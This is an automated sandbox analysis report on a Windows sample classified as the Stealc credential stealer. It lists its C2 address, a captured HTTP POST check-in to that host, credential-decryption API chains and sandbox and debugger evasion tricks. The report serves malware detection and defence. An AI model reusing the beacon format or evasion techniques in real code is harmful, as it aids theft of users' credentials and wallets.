Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532474
MD5:8008a506f397dc8e845a8b9bc62bded1
SHA1:df3448212221cdab90c8f4468b4b61ec4e5a408b
SHA256:541cd6146cb146b9700ea311b06ee7079a3818dc1dbac4f833c2b90ca17ce8d0
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8008A506F397DC8E845A8B9BC62BDED1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1748JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1748JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.bc0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T10:39:07.755961+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.bc0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/(Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php#Virustotal: Detection: 18%Perma Link
                Source: http://185.215.113.37//Virustotal: Detection: 20%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php;Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phplVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpCVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpgVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00BCC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00BC9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00BC7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00BC9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00BD8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BD38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BD4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BCDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BCE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BCED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BD4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BCF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BD3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BCDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BCBE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 38 30 42 30 44 31 33 36 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="hwid"2580B0D136AA1106654546------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build"doma------AECAKECAEGDHIECBGHII--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00BC4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 38 30 42 30 44 31 33 36 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="hwid"2580B0D136AA1106654546------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build"doma------AECAKECAEGDHIECBGHII--
                Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1749682268.00000000013F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/(
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37//
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
                Source: file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
                Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37R

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010951480_2_01095148
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8301E0_2_00F8301E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F898080_2_00F89808
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010328290_2_01032829
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7A9990_2_00F7A999
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8B98F0_2_00F8B98F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6710A0_2_00E6710A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7F9040_2_00F7F904
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010043CE0_2_010043CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F76A030_2_00F76A03
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA13B10_2_00EA13B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F814E90_2_00F814E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5B4840_2_00E5B484
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8644C0_2_00F8644C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7EC210_2_00F7EC21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7C40B0_2_00F7C40B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F87DCA0_2_00F87DCA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F84D820_2_00F84D82
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F00EF30_2_00F00EF3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED26DF0_2_00ED26DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F186620_2_00F18662
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3F6A0_2_00ED3F6A
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BC45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: rwxwlxgf ZLIB complexity 0.9949040354330708
                Source: file.exe, 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00BD8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00BD3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\WUANH9Q9.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1781760 > 1048576
                Source: file.exeStatic PE information: Raw size of rwxwlxgf is bigger than: 0x100000 < 0x18ce00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.bc0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rwxwlxgf:EW;nitsrzzh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rwxwlxgf:EW;nitsrzzh:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BD9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bd610 should be: 0x1bdb03
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: rwxwlxgf
                Source: file.exeStatic PE information: section name: nitsrzzh
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01050900 push ecx; mov dword ptr [esp], edx0_2_01050904
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01050900 push 4718C9F3h; mov dword ptr [esp], esi0_2_01050C12
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01050900 push ebp; mov dword ptr [esp], edi0_2_01050C30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100F117 push eax; mov dword ptr [esp], edi0_2_0100F168
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40D0 push esi; mov dword ptr [esp], ecx0_2_00FE41A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01095148 push ebp; mov dword ptr [esp], edi0_2_010951B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01095148 push ebx; mov dword ptr [esp], esp0_2_010951C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01095148 push eax; mov dword ptr [esp], ebp0_2_01095229
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01095148 push ebx; mov dword ptr [esp], ecx0_2_01095238
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01095148 push eax; mov dword ptr [esp], 236149D1h0_2_010952CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push ecx; mov dword ptr [esp], ebx0_2_00EE391C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push 2DAE596Bh; mov dword ptr [esp], eax0_2_00EE3927
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push esi; mov dword ptr [esp], eax0_2_00EE39BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push 1DB743B1h; mov dword ptr [esp], edx0_2_00EE39CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push 7E5420BBh; mov dword ptr [esp], edi0_2_00EE39D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push 62256DE4h; mov dword ptr [esp], esi0_2_00EE39E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push 5796EEC3h; mov dword ptr [esp], edx0_2_00EE3A46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push edx; mov dword ptr [esp], 60AA554Ah0_2_00EE3A5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE38AA push ebp; mov dword ptr [esp], eax0_2_00EE3AC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBE8A2 push 1344180Dh; mov dword ptr [esp], edi0_2_00FBE8D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105E977 push 16BA950Fh; mov dword ptr [esp], eax0_2_0105E9BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF408B push esi; mov dword ptr [esp], eax0_2_00FF40B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF408B push ebx; mov dword ptr [esp], edi0_2_00FF40DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDB035 push ecx; ret 0_2_00BDB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010181B3 push 72D2E081h; mov dword ptr [esp], eax0_2_01018248
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010181B3 push ecx; mov dword ptr [esp], edx0_2_01018275
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010481CC push 42A870E5h; mov dword ptr [esp], eax0_2_0104830F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010481CC push ecx; mov dword ptr [esp], edi0_2_01048313
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010481CC push eax; mov dword ptr [esp], ecx0_2_0104832A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010949C7 push 36012492h; mov dword ptr [esp], eax0_2_01094A14
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010399D5 push 02CBE914h; mov dword ptr [esp], edi0_2_01039B5E
                Source: file.exeStatic PE information: section name: rwxwlxgf entropy: 7.9545126546693545

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BD9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13624
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E222CF second address: E222D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21BCA second address: E21BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9012D second address: F90131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90131 second address: F90143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90143 second address: F90155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Bh 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
